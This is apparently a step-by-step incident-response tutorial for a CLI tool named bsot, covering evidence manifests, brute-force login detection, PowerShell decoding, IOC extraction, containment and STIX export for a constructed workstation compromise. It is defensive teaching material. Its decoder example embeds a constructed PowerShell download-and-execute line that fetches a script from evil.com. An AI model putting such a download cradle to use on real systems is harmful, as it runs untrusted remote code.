Incident Response
From detection to containment to documentation.
Scenario
An alert fires indicating potential compromise of a workstation. The security team needs to investigate, contain the threat, and document findings.
Phase 1: Initial Response
Create Investigation Case
```bash
bsot case new compromised-workstation-ws42 \
  --type intrusion \
  --severity critical \
  --analyst "Jane Doe"
```
Document Initial Alert
```bash
bsot case timeline "EDR alert: Suspicious PowerShell activity on WS42" \
  --time "2025-01-15 14:30:00"
bsot case note "Alert from CrowdStrike: Encoded PowerShell execution detected"
```
Phase 2: Evidence Collection
Collect Artifacts from System
Sample Output
```text
══════════════════════════════════════════════════════════
Forensic Artifact Collection
══════════════════════════════════════════════════════════
Profile: full
Hostname: WS42
Collecting artifacts...
✓ Collection complete
Output directory: ./evidence/ws42
Files collected: 47
Total size: 2.3 MB
── Artifacts Collected ───────────────────────────────────
• system/processes
• system/connections
• system/users
• system/scheduled_tasks
• system/startup_items
• system/installed_software
• logs/security
• logs/system
• logs/powershell
```
Create Evidence Manifest
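The point of a manifest is that every collected file gets a cryptographic hash at collection time, so that any later modification, deletion or addition in the evidence directory is detectable. The script below is an added example of that check and is not bsot's own manifest code; it makes no assumptions about bsot's manifest format. It writes a small constructed evidence tree into a temporary directory so it runs offline.

```python
"""Build and verify a SHA-256 evidence manifest for a collection directory.

Added example for this page, not bsot's manifest implementation. The
evidence files created in demo() are constructed for the example.
"""
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone

CHUNK = 1 << 20  # hash in 1 MiB chunks so large artifacts do not sit in RAM


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root, case_id, collector):
    """Return a manifest dict with one entry per file, keyed by path relative to root."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            files[rel] = {"sha256": sha256_file(full), "size": os.path.getsize(full)}
    return {
        "case": case_id,
        "collector": collector,
        "collected_at": datetime.now(timezone.utc).isoformat(),
        "files": files,
    }


def verify_manifest(root, manifest):
    """Return sorted (relative_path, problem) tuples; an empty list means the evidence is intact."""
    problems = []
    for rel, entry in manifest["files"].items():
        full = os.path.join(root, *rel.split("/"))
        if not os.path.exists(full):
            problems.append((rel, "missing"))
        elif sha256_file(full) != entry["sha256"]:
            problems.append((rel, "hash mismatch"))
    # Files that appeared after collection are also a chain-of-custody problem.
    for dirpath, _, names in os.walk(root):
        for name in names:
            rel = os.path.relpath(os.path.join(dirpath, name), root).replace(os.sep, "/")
            if rel not in manifest["files"] and rel != "manifest.json":
                problems.append((rel, "not in manifest"))
    return sorted(problems)


def demo():
    """Constructed evidence tree: two artifacts, verified clean, then one is tampered with."""
    root = tempfile.mkdtemp(prefix="ws42-")
    os.makedirs(os.path.join(root, "system"))
    with open(os.path.join(root, "system", "processes"), "w") as f:
        f.write("powershell.exe -NoP -W Hidden -enc <blob>\n")  # constructed content
    with open(os.path.join(root, "system", "connections"), "w") as f:
        f.write("203.0.113.50:443 ESTABLISHED\n")  # constructed content
    manifest = build_manifest(root, "compromised-workstation-ws42", "Jane Doe")
    with open(os.path.join(root, "manifest.json"), "w") as f:
        json.dump(manifest, f, indent=2)
    clean = verify_manifest(root, manifest)
    with open(os.path.join(root, "system", "connections"), "a") as f:
        f.write("tampered\n")
    tampered = verify_manifest(root, manifest)
    return clean, tampered


if __name__ == "__main__":
    print(demo())
```

Store the manifest's own hash (or a signature over it) somewhere the evidence directory cannot reach, such as the case record; a manifest sitting next to the files it describes can be rewritten by whoever rewrites the files.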
Add Evidence to Case
Phase 3: Log Analysis
Analyze Authentication Logs
Sample Output
```text
══════════════════════════════════════════════════════════
Log Analysis Results
══════════════════════════════════════════════════════════
── Findings (2) ──────────────────────────────────────────
[HIGH] Suspicious Login Pattern
User: admin
MITRE: T1078 - Valid Accounts
Multiple failed logins followed by success from new IP
Events: 15
[MEDIUM] Off-Hours Activity
User: admin
Time: 02:15:00 UTC
Activity during non-business hours
```
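Both findings above come from simple stateful rules over the authentication events. The following is an added example of that detection logic, not bsot's analysis engine: it runs over a constructed log in a one-event-per-line form (timestamp, Windows event ID 4624/4625, user, source IP) and flags a success that follows a burst of failures from an IP the account has never succeeded from, plus any success outside an assumed 08:00 to 18:00 UTC business window.

```python
"""Detect 'failed logins then success from a new IP' and off-hours logins.

Added example, not bsot's own code. SAMPLE_LOG is constructed; map real
4624 (success) and 4625 (failure) events into the same four fields.
"""
from collections import defaultdict
from datetime import datetime, timedelta, timezone

SAMPLE_LOG = """\
2025-01-14T09:02:11Z 4624 admin 10.0.5.23
2025-01-14T17:40:02Z 4624 admin 10.0.5.23
2025-01-15T02:13:01Z 4625 admin 203.0.113.50
2025-01-15T02:13:09Z 4625 admin 203.0.113.50
2025-01-15T02:13:18Z 4625 admin 203.0.113.50
2025-01-15T02:13:27Z 4625 admin 203.0.113.50
2025-01-15T02:13:35Z 4625 admin 203.0.113.50
2025-01-15T02:14:51Z 4625 admin 203.0.113.50
2025-01-15T02:15:00Z 4624 admin 203.0.113.50
2025-01-15T08:31:44Z 4624 jdoe 10.0.5.41
"""

SUCCESS, FAILED = "4624", "4625"


def parse(text):
    """Parse the constructed format into time-sorted event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, user, ip = line.split()
        events.append({
            "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc),
            "id": event_id, "user": user, "ip": ip,
        })
    return sorted(events, key=lambda e: e["time"])


def bruteforce_then_success(events, min_failures=5, window=timedelta(minutes=10)):
    """Flag a success preceded by >= min_failures failures for the same (user, ip)
    inside `window`, where that IP has no earlier successful login for the user.
    The guessing is T1110 (Brute Force); the resulting login is T1078 (Valid Accounts)."""
    findings = []
    known_ips = defaultdict(set)          # user -> IPs with a prior successful login
    recent_failures = defaultdict(list)   # (user, ip) -> timestamps of failures
    for e in events:
        key = (e["user"], e["ip"])
        if e["id"] == FAILED:
            recent_failures[key].append(e["time"])
        elif e["id"] == SUCCESS:
            fails = [t for t in recent_failures[key] if e["time"] - t <= window]
            if len(fails) >= min_failures and e["ip"] not in known_ips[e["user"]]:
                findings.append({
                    "severity": "HIGH", "user": e["user"], "ip": e["ip"],
                    "failures": len(fails), "success_at": e["time"].isoformat(),
                    "mitre": ["T1110", "T1078"],
                })
            recent_failures[key] = []
            known_ips[e["user"]].add(e["ip"])
    return findings


def off_hours(events, start_hour=8, end_hour=18):
    """Successful logins outside the assumed business window (hours in UTC)."""
    return [
        {"severity": "MEDIUM", "user": e["user"], "time": e["time"].isoformat()}
        for e in events
        if e["id"] == SUCCESS and not (start_hour <= e["time"].hour < end_hour)
    ]


if __name__ == "__main__":
    ev = parse(SAMPLE_LOG)
    print(bruteforce_then_success(ev))
    print(off_hours(ev))
```

The "new IP" condition is what separates an attacker's first successful guess from a legitimate user who fat-fingered a password a few times: the latter succeeds from an address the account has used before. Seed `known_ips` from a longer baseline than the window you are analysing, or every first login of the day looks new.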
Analyze PowerShell Logs
Phase 4: Malware Analysis
Decode Suspicious Script
Sample Output
Extract IOCs from Script
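The two steps above, decoding and IOC extraction, are shown together in the following added example, which is not bsot's decoder. It assumes the EDR captured a `powershell -EncodedCommand` blob (base64 over UTF-16LE), peels an inner `FromBase64String(...)` layer of the kind droppers commonly use, and then pulls URLs, domains and IPv4 addresses from every layer. The stage-1 script, the inner payload and the TLD list are constructed for the example.

```python
"""Decode a PowerShell -EncodedCommand blob and extract IOCs from every layer.

Added example, not bsot's own code. INNER, STAGE1 and COMMON_TLDS are
constructed for this page.
"""
import base64
import hashlib
import re

# Constructed stage-1 script that fetches stage 2 from the C2 named in this case.
INNER = "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/stage2.ps1')"
STAGE1 = (
    "$c2 = '203.0.113.50'; "
    "$s = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
    + base64.b64encode(INNER.encode()).decode() + "')); IEX $s"
)
# What the EDR sees on the command line: powershell -enc <ENCODED_COMMAND>
ENCODED_COMMAND = base64.b64encode(STAGE1.encode("utf-16le")).decode()

B64_RE = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]{16,})'\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
# Constructed subset; real tooling filters against the public suffix list.
COMMON_TLDS = {"com", "net", "org", "io", "ru", "cn", "info", "biz", "xyz", "top"}


def decode_encoded_command(blob):
    """-EncodedCommand is base64 of UTF-16LE text; fall back to UTF-8 for odd tooling."""
    raw = base64.b64decode(blob)
    try:
        return raw.decode("utf-16le")
    except UnicodeDecodeError:
        return raw.decode("utf-8", errors="replace")


def unwrap_layers(blob, max_depth=5):
    """Return every decoded layer, outermost first, following FromBase64String('...')."""
    layers = [decode_encoded_command(blob)]
    for _ in range(max_depth):
        m = B64_RE.search(layers[-1])
        if not m:
            break
        layers.append(base64.b64decode(m.group(1)).decode("utf-8", errors="replace"))
    return layers


def extract_iocs(text):
    """URLs, domains and syntactically valid IPv4 addresses found in text.
    The TLD filter drops .NET type names such as Net.WebClient that look like hostnames."""
    urls = set(URL_RE.findall(text))
    ips = {ip for ip in IPV4_RE.findall(text) if all(int(o) < 256 for o in ip.split("."))}
    domains = {d.lower() for d in DOMAIN_RE.findall(text)
               if d.rsplit(".", 1)[1].lower() in COMMON_TLDS}
    return {"urls": sorted(urls), "domains": sorted(domains), "ips": sorted(ips)}


def analyze(blob):
    """Decode all layers, extract IOCs across them, and hash the outer script for the case."""
    layers = unwrap_layers(blob)
    return {
        "layers": layers,
        "iocs": extract_iocs("\n".join(layers)),
        "sha256": hashlib.sha256(layers[0].encode()).hexdigest(),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(analyze(ENCODED_COMMAND), indent=2))
```

Hash the decoded script as well as the raw command line: the EDR's hash covers the base64 text, which changes with every re-encoding, while the decoded content is what you will want to match across hosts.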
Phase 5: Threat Intelligence
Enrich Discovered IOCs
```bash
# Enrich C2 domain
bsot intel enrich evil.com
# Bulk enrich all IOCs
bsot intel bulk -f all_iocs.txt --json -o enriched_iocs.json
```
Check WHOIS
Phase 6: Containment
Block Attacker IP at Cloudflare
Generate Local Containment Commands
```bash
bsot ir contain --block-ip 203.0.113.50 --platform windows
bsot ir contain --disable-user compromised_admin --platform windows
```
Document Containment Actions
```bash
bsot case timeline "Blocked C2 IP 203.0.113.50 at Cloudflare"
bsot case timeline "Disabled compromised admin account"
bsot case timeline "Isolated workstation WS42 from network"
```
Phase 7: Investigation Notes
```bash
bsot case note "Attack vector: Phishing email with malicious attachment"
bsot case note "Initial access: 2025-01-15 02:15 UTC via RDP"
bsot case note "Lateral movement: Attempted access to file server FS01"
bsot case note "C2 communication: evil.com (203.0.113.50)"
bsot case note "Data exfiltration: No evidence of data theft"
```
Phase 8: Reporting
Generate Executive Report
Generate Technical Report
Export IOCs
```bash
# For SIEM/SOAR
bsot report ioc --format stix -o reports/iocs.stix.json
# For blocklists
bsot report ioc --format csv -o reports/blocklist.csv
```
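What a STIX export has to contain is worth seeing once, because SIEM and SOAR importers reject bundles with the wrong ID form or pattern syntax. The following is an added example of building a STIX 2.1 bundle and a CSV blocklist from this case's IOC table; it is not bsot's exporter and does not reproduce bsot's output format. The hash value on the page is a placeholder, so a constructed 64-hex value stands in for it here.

```python
"""Turn the case IOC table into a STIX 2.1 indicator bundle and a CSV blocklist.

Added example, not bsot's own exporter. The SHA-256 value below is a
constructed placeholder.
"""
import csv
import io
import uuid
from datetime import datetime, timezone

IOCS = [
    ("ip", "203.0.113.50", "C2 server"),
    ("domain", "evil.com", "C2 domain"),
    ("url", "http://evil.com/stage2.ps1", "Payload URL"),
    ("sha256", "a" * 64, "Malicious script"),  # constructed placeholder hash
]

# STIX patterning expressions over the STIX 2.1 Cyber Observable objects.
PATTERNS = {
    "ip": "[ipv4-addr:value = '{v}']",
    "domain": "[domain-name:value = '{v}']",
    "url": "[url:value = '{v}']",
    "sha256": "[file:hashes.'SHA-256' = '{v}']",
}


def _escape(value):
    """STIX string literals are single-quoted; escape backslashes and quotes inside them."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def _stix_timestamp(dt):
    """STIX timestamps are UTC, RFC 3339, with a trailing Z (millisecond precision here)."""
    return dt.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3] + "Z"


def make_indicator(ioc_type, value, context, created=None):
    """One STIX 2.1 indicator object; IDs must be 'type--<uuid>'."""
    ts = _stix_timestamp(created or datetime.now(timezone.utc))
    return {
        "type": "indicator",
        "spec_version": "2.1",
        "id": f"indicator--{uuid.uuid4()}",
        "created": ts,
        "modified": ts,
        "name": f"{context}: {value}",
        "indicator_types": ["malicious-activity"],
        "pattern": PATTERNS[ioc_type].format(v=_escape(value)),
        "pattern_type": "stix",
        "valid_from": ts,
        "labels": ["case:compromised-workstation-ws42"],
    }


def to_stix_bundle(iocs):
    """A bundle is just a typed container with its own id; it carries no timestamps."""
    return {
        "type": "bundle",
        "id": f"bundle--{uuid.uuid4()}",
        "objects": [make_indicator(t, v, c) for t, v, c in iocs],
    }


def to_blocklist_csv(iocs):
    """Only network indicators belong on a perimeter blocklist; hashes go to the EDR."""
    buf = io.StringIO()
    w = csv.writer(buf)
    w.writerow(["type", "value", "context"])
    for t, v, c in iocs:
        if t in ("ip", "domain", "url"):
            w.writerow([t, v, c])
    return buf.getvalue()


if __name__ == "__main__":
    import json
    print(json.dumps(to_stix_bundle(IOCS), indent=2))
    print(to_blocklist_csv(IOCS))
```

Keep `valid_from` honest: it should be the earliest time the indicator is known to have been malicious (the 02:18 payload download here), not the time of export, because downstream consumers use it to bound retrospective searches.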
Export Timeline
Phase 9: Case Closure
Package Case
Close Case
Complete Timeline
| Time (UTC, 2025-01-15) | Event |
|---|---|
| 02:15 | Attacker gains RDP access using stolen credentials |
| 02:17 | PowerShell executes encoded command |
| 02:18 | Stage 2 payload downloaded from C2 |
| 02:20 | Attempt to access file server FS01 (failed) |
| 14:30 | EDR alert triggered |
| 14:35 | Investigation started |
| 14:45 | Artifacts collected |
| 15:00 | C2 identified and blocked |
| 15:15 | User account disabled, system isolated |
| 16:00 | Analysis complete |
| 17:00 | Reports generated |
IOCs Discovered
| Type | Value | Context |
|---|---|---|
| IP | 203.0.113.50 | C2 server |
| Domain | evil.com | C2 domain |
| URL | http://evil.com/stage2.ps1 | Payload URL |
| Hash | abc123... | Malicious script |
Lessons Learned
- MFA on the RDP endpoint would have stopped the login with stolen credentials
- PowerShell script block logging was what made the encoded command visible to the EDR and the analyst
- Network segmentation blocked the attempted lateral movement to FS01
- Containment about 45 minutes after the alert limited the attacker's window; no evidence of data exfiltration was found